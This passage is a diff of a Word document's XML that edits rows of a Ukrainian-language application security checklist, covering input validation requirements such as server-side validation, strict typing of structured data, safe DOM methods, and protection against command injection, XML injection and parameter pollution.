+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>4.10</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17898,24 +20536,106 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+                <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>4.7</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся, що перевірк</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>а</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> на стороні клієнта використовується в якості другої лінії </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>захисту</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">разом з </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> перевірк</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ою</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> на стороні сервера.</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17943,164 +20663,52 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+                <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що програма не сприйнятливий до </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>OS</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Command</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Injection</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>, або що контроль безпеки запобіг</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ає</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>OS</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Command</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Injection</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -18131,11 +20739,21 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.11</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -18163,14 +20781,86 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+                <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся в тому, що структуровані дані </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>строго</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> типізован</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>і</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> і звіряються</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> з</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> певною схемою, включаючи допустимі символи, довжини і структури (наприклад, номери кредитних карт або по телефону</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -18198,9 +20888,45 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+                <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -18246,7 +20972,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4.8</w:t>
+              <w:t>4.12</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18291,37 +21017,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>в тому, що програма не вразлива</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> до </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>звичайних атак</w:t>
+              <w:t>Переконайтеся в тому, що дані, що передаються з одного контексту</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -18339,49 +21035,99 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>DOM</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> в інший</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, використовуют</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> безпечні методи </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>JavaScript</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, такі як </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>InnerText</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> і </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>val</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>XML</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, такі як </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>XPath</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> фальсифікація запитів і </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>XML injection</w:t>
+              <w:t>ue</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -18433,6 +21179,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -18463,11 +21210,22 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -18498,6 +21256,16 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -18543,7 +21311,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>4.9</w:t>
+              <w:t>4.13</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18588,118 +21356,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що програма має захист від атак забруднення параметрів </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>HTTP</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, особливо якщо </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
